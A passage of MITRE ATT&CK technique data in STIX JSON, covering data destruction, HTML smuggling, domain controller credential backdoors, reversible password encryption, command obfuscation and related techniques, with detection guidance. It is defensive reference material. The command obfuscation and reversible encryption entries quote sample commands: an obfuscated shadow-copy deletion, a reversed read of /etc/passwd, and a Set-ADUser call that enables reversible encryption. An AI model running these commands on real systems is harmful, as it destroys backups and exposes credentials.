{"source_name": "Frisk DMA August 2016", "description": "Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018.", "url": "https://www.youtube.com/watch?v=fXthwl6ShOg"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Server Software Component", "description": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.\n\nProcess monitoring may be used to detect servers components that perform suspicious actions such as running cmd.exe or accessing files. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells) ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS", "Network"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d456de47-a16f-4e46-8980-e67478a12dcb", "created": "2019-06-28T17:52:07.296Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1505", "external_id": "T1505"}, {"source_name": "volexity_0day_sophos_FW", "description": "Adair, S., Lancaster, T., Volexity Threat Research. (2022, June 15). DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach. Retrieved July 1, 2022.", "url": "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/"}, {"source_name": "US-CERT Alert TA15-314A Web Shells", "description": "US-CERT. (2015, November 13). Compromised Web Servers and Web Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.", "url": "https://www.us-cert.gov/ncas/alerts/TA15-314A"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-03T17:30:32.192Z", "name": "Data Destruction", "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Brent Murphy, Elastic", "David French, Elastic", "Syed Ummar Farooqh, McAfee", "Prasad Somasamudram, McAfee", "Sekhar Sarukkai, McAfee", "Varonis Threat Labs", "Joey Lei"], "x_mitre_deprecated": false, "x_mitre_detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.\n\nIn cloud environments, the occurrence of anomalous high-volume deletion events, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket, within a short period of time may indicate suspicious activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS", "Containers"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "created": "2019-03-14T18:47:17.701Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1485", "external_id": "T1485"}, {"source_name": "DOJ - Cisco Insider", "description": "DOJ. (2020, August 26). San Jose Man Pleads Guilty To Damaging Cisco\u2019s Network. Retrieved December 15, 2020.", "url": "https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network"}, {"source_name": "Unit 42 Shamoon3 2018", "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.", "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/"}, {"source_name": "Palo Alto Shamoon Nov 2016", "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.", "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"}, {"source_name": "FireEye Shamoon Nov 2016", "description": "FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html"}, {"source_name": "Kaspersky StoneDrill 2017", "description": "Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.", "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf"}, {"source_name": "Talos Olympic Destroyer 2018", "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"}, {"source_name": "Data Destruction - Threat Post", "description": "Mimoso, M.. (2014, June 18). Hacker Puts Hosting Service Code Spaces Out of Business. Retrieved December 15, 2020.", "url": "https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/"}, {"source_name": "Symantec Shamoon 2012", "description": "Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.", "url": "https://www.symantec.com/connect/blogs/shamoon-attacks"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Non-Standard Encoding", "description": "Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc", "created": "2020-03-14T23:39:50.117Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1132/002", "external_id": "T1132.002"}, {"source_name": "Wikipedia Binary-to-text Encoding", "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding"}, {"source_name": "Wikipedia Character Encoding", "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", "url": "https://en.wikipedia.org/wiki/Character_encoding"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Domain Controller Authentication", "description": "Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. \n\nMalware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user\u2019s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", "created": "2020-02-11T19:05:02.399Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/001", "external_id": "T1556.001"}, {"source_name": "Dell Skeleton", "description": "Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.", "url": "https://www.secureworks.com/research/skeleton-key-malware-analysis"}, {"source_name": "TechNet Audit Policy", "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-11T15:53:00.577Z", "name": "Transfer Data to Cloud Account", "description": "Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.\n\nA defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.(Citation: TLDRSec AWS Attacks)\n\nAdversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature)\n\nIncidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Praetorian", "Darin Smith, Cisco", "ExtraHop", "Gabriel Currie"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. \n\nIn AWS, sharing an Elastic Block Store (EBS) snapshot, either with specified users or publicly, generates a ModifySnapshotAttribute event in CloudTrail logs.(Citation: AWS EBS Snapshot Sharing) Similarly, in Azure, creating a Shared Access Signature (SAS) URI for a Virtual Hard Disk (VHS) snapshot generates a \"Get Snapshot SAS URL\" event in Activity Logs.(Citation: Azure Blob Snapshots)(Citation: Azure Shared Access Signature)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS", "SaaS", "Google Workspace", "Office 365"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", "created": "2019-08-30T13:03:04.038Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1537", "external_id": "T1537"}, {"source_name": "AWS EBS Snapshot Sharing", "description": "Amazon Web Services. (n.d.). Share an Amazon EBS snapshot. Retrieved March 2, 2022.", "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html"}, {"source_name": "TLDRSec AWS Attacks", "description": "Clint Gibler and Scott Piper. (2021, January 4). Lesser Known Techniques for Attacking AWS Environments. Retrieved March 4, 2024.", "url": "https://tldrsec.com/p/blog-lesser-known-aws-attacks"}, {"source_name": "Azure Shared Access Signature", "description": "Delegate access with a shared access signature. (2019, December 18). Delegate access with a shared access signature. Retrieved March 2, 2022.", "url": "https://docs.microsoft.com/en-us/rest/api/storageservices/delegate-access-with-shared-access-signature"}, {"source_name": "Azure Blob Snapshots", "description": "Microsoft Azure. (2021, December 29). Blob snapshots. Retrieved March 2, 2022.", "url": "https://docs.microsoft.com/en-us/azure/storage/blobs/snapshots-overview"}, {"source_name": "Microsoft Azure Storage Shared Access Signature", "description": "Microsoft. (2023, June 7). Grant limited access to Azure Storage resources using shared access signatures (SAS). Retrieved March 4, 2024.", "url": "https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview"}, {"source_name": "DOJ GRU Indictment Jul 2018", "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.", "url": "https://www.justice.gov/file/1080281/download"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-07-14T14:01:41.475Z", "name": "HTML Smuggling", "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Stan Hegt, Outflank", "Jonathan Boucher, @crash_wave, Bank of Canada", "Krishnan Subramanian, @krish203", "Vinay Pidathala"], "x_mitre_deprecated": false, "x_mitre_detection": "Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as Blob, msSaveOrOpenBlob, and/or download may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.\n\nConsider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Web Content Filters", "Static File Analysis"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", "created": "2021-05-20T12:20:42.219Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/006", "external_id": "T1027.006"}, {"source_name": "Outlflank HTML Smuggling 2018", "description": "Hegt, S. (2018, August 14). HTML smuggling explained. Retrieved May 20, 2021.", "url": "https://outflank.nl/blog/2018/08/14/html-smuggling-explained/"}, {"source_name": "MSTIC NOBELIUM May 2021", "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.", "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/"}, {"source_name": "HTML Smuggling Menlo Security 2020", "description": "Subramanian, K. (2020, August 18). New HTML Smuggling Attack Alert: Duri. Retrieved May 20, 2021.", "url": "https://www.menlosecurity.com/blog/new-attack-alert-duri"}, {"source_name": "nccgroup Smuggling HTA 2017", "description": "Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved May 20, 2021.", "url": "https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Reversible Encryption", "description": "An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)\n\nIf the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:\n\n1. Encrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters\n2. 16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters\n3. Global LSA secret (G$MSRADIUSCHAPKEY)\n4. Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)\n\nWith this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)\n\nAn adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to \"Windows Server 2008\" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitor property changes in Group Policy: Computer Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password Policy\\Store passwords using reversible encryption. By default, the property should be set to Disabled.\n\nMonitor command-line usage for -AllowReversiblePasswordEncryption $true or other actions that could be related to malicious tampering of user settings (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). Furthermore, consider monitoring and/or blocking suspicious execution of Active Directory PowerShell modules, such as Set-ADUser and Set-ADAccountControl, that change account configurations. \n\nMonitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48", "created": "2022-01-13T20:02:28.349Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1556/005", "external_id": "T1556.005"}, {"source_name": "store_pwd_rev_enc", "description": "Microsoft. (2021, October 28). Store passwords using reversible encryption. Retrieved January 3, 2022.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption"}, {"source_name": "how_pwd_rev_enc_1", "description": "Teusink, N. (2009, August 25). Passwords stored using reversible encryption: how it works (part 1). Retrieved November 17, 2021.", "url": "http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html"}, {"source_name": "how_pwd_rev_enc_2", "description": "Teusink, N. (2009, August 26). Passwords stored using reversible encryption: how it works (part 2). Retrieved November 17, 2021.", "url": "http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html"}, {"source_name": "dump_pwd_dcsync", "description": "Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.", "url": "https://adsecurity.org/?p=2053"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Command Obfuscation", "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing, `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`\u201cWor\u201d+\u201cd.Application\u201d`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as Invoke-Obfuscation and Invoke-DOSfucation have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["TruKno", "Tim Peck", "George Thomas"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", "created": "2023-03-14T17:36:01.022Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1027/010", "external_id": "T1027.010"}, {"source_name": "Twitter Richard WMIC", "description": "Ackroyd, R. (2023, March 24). Twitter. Retrieved March 24, 2023.", "url": "https://twitter.com/rfackroyd/status/1639136000755765254"}, {"source_name": "Invoke-Obfuscation", "description": "Bohannon, D. (2016, September 24). Invoke-Obfuscation. Retrieved March 17, 2023.", "url": "https://github.com/danielbohannon/Invoke-Obfuscation"}, {"source_name": "Invoke-DOSfuscation", "description": "Bohannon, D. (2018, March 19). Invoke-DOSfuscation. Retrieved March 17, 2023.", "url": "https://github.com/danielbohannon/Invoke-DOSfuscation"}, {"source_name": "FireEye Obfuscation June 2017", "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.", "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html"}, {"source_name": "Malware Monday VBE", "description": "Bromiley, M. (2016, December 27). Malware Monday: VBScript and VBE Files. Retrieved March 17, 2023.", "url": "https://bromiley.medium.com/malware-monday-vbscript-and-vbe-files-292252c1a16"}, {"source_name": "Akamai JS", "description": "Katz, O. (2020, October 26). Catch Me if You Can\u2014JavaScript Obfuscation. Retrieved March 17, 2023.", "url": "https://www.akamai.com/blog/security/catch-me-if-you-can-javascript-obfuscation"}, {"source_name": "Bashfuscator Command Obfuscators", "description": "LeFevre, A. (n.d.). Bashfuscator Command Obfuscators. Retrieved March 17, 2023.", "url": "https://bashfuscator.readthedocs.io/en/latest/Mutators/command_obfuscators/index.html"}, {"source_name": "Microsoft PowerShellB64", "description": "Microsoft. (2023, February 8). about_PowerShell_exe: EncodedCommand. Retrieved March 17, 2023.", "url": "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_powershell_exe?view=powershell-5.1#-encodedcommand-base64encodedcommand"}, {"source_name": "RC PowerShell", "description": "Red Canary. (n.d.). 2022 Threat Detection Report: PowerShell. Retrieved March 17, 2023.", "url": "https://redcanary.com/threat-detection-report/techniques/powershell/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Install Root Certificate", "description": "Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security 